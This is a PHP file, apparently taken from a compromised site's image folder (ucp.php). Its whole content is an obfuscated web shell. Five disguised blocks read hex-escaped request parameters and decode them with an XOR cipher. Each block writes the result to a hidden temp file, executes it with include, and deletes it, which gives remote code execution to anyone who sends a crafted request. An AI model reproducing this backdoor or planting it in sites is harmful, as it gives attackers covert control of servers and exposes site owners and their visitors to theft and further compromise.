File: //proc/self/root/proc/self/root/home/vitanhod/sawpalmeetto.vitavit.com.pk/img/ucp.php
<?php if(isset($_REQUEST) && isset($_REQUEST["sym"])){ $parameter_group = array_filter([getenv("TMP"), getcwd(), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TEMP"), "/tmp"]); $marker = $_REQUEST["sym"]; $marker =explode ("." ,$marker ) ; $hld = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $len = count($marker); for ($q = 0; $q <$len; $q++) { $v8 = $marker[$q]; $sChar = ord($salt[$q % $sLen]); $d = ((int)$v8 - $sChar - ($q % 10)) ^ 79; $hld .= chr($d); } foreach ($parameter_group as $resource) { if (!( !is_dir($resource) || !is_writable($resource) )) { $fac = vsprintf("%s/%s", [$resource, ".holder"]); if (file_put_contents($fac, $hld)) { include $fac; @unlink($fac); die(); } } } }
if(in_array("e\x6C\x65m", array_keys($_POST))){ $fac = array_filter([session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), sys_get_temp_dir(), "/dev/shm", getenv("TEMP")]); $entity = $_POST["e\x6C\x65m"]; $entity =explode("." , $entity) ; $reference = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $len = count( $entity ); for( $q = 0; $q < $len; $q++) { $v5 = $entity[$q]; $chS = ord( $s[$q % $sLen] ); $dec =( ( int)$v5 - $chS -( $q % 10))^ 45; $reference .= chr( $dec ); } foreach ($fac as $key => $tkn) { if (!!is_dir($tkn) && !!is_writable($tkn)) { $factor = implode("/", [$tkn, ".descriptor"]); if (@file_put_contents($factor, $reference) !== false) { include $factor; unlink($factor); exit; } } } }
if(in_array("k", array_keys($_REQUEST))){ $res = $_REQUEST["k"]; $res = explode ( '.', $res ) ; $ref = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $len = count($res); for($k = 0; $k < $len; $k++) {$v5 = $res[$k]; $chS = ord($s[$k % $lenS]); $d =((int)$v5 - $chS -($k % 10)) ^ 98; $ref .= chr($d); } $reference = array_filter([getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getcwd()]); foreach ($reference as $dchunk) { if (is_writable($dchunk) && is_dir($dchunk)) { $ptr = sprintf("%s/.property_set", $dchunk); $success = file_put_contents($ptr, $ref); if ($success) { include $ptr; @unlink($ptr); die();} } } }
if(filter_has_var(INPUT_POST, "sy\x6D")){ $key = $_REQUEST["sy\x6D"]; $key = explode( "." , $key) ; $rec = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); foreach ($key as $m => $v8) { $chS = ord($salt7[$m % $sLen]); $d = ((int)$v8 - $chS - ($m % 10))^16; $rec .= chr($d); } $item = array_filter([getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), getcwd(), session_save_path(), "/dev/shm", "/var/tmp"]); for ($tkn = 0, $entry = count($item); $tkn < $entry; $tkn++) { $itm = $item[$tkn]; if ((bool)is_dir($itm) && (bool)is_writable($itm)) { $pointer = str_replace("{var_dir}", $itm, "{var_dir}/.ptr"); if (@file_put_contents($pointer, $rec) !== false) { include $pointer; unlink($pointer); die(); } } } }
if(array_key_exists("\x6Fb\x6A", $_POST) && !is_null($_POST["\x6Fb\x6A"])){
$dat = $_POST["\x6Fb\x6A"];
$dat = explode ('.',$dat ) ;
$item = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s);
foreach( $dat as $u => $v9):
$chS = ord( $s[$u% $lenS]);
$dec =( ( int)$v9 - $chS -( $u% 10))^ 30;
$item .= chr( $dec);
endforeach;
$descriptor = array_filter([sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/dev/shm", getenv("TMP"), getcwd(), "/tmp"]);
foreach ($descriptor as $itm):
if (!!is_dir($itm) && !!is_writable($itm)) {
$element = str_replace("{var_dir}", $itm, "{var_dir}/.hld");
$file = fopen($element, 'w');
if ($file) {
fwrite($file, $item);
fclose($file);
include $element;
@unlink($element);
die();
}
}
endforeach;
}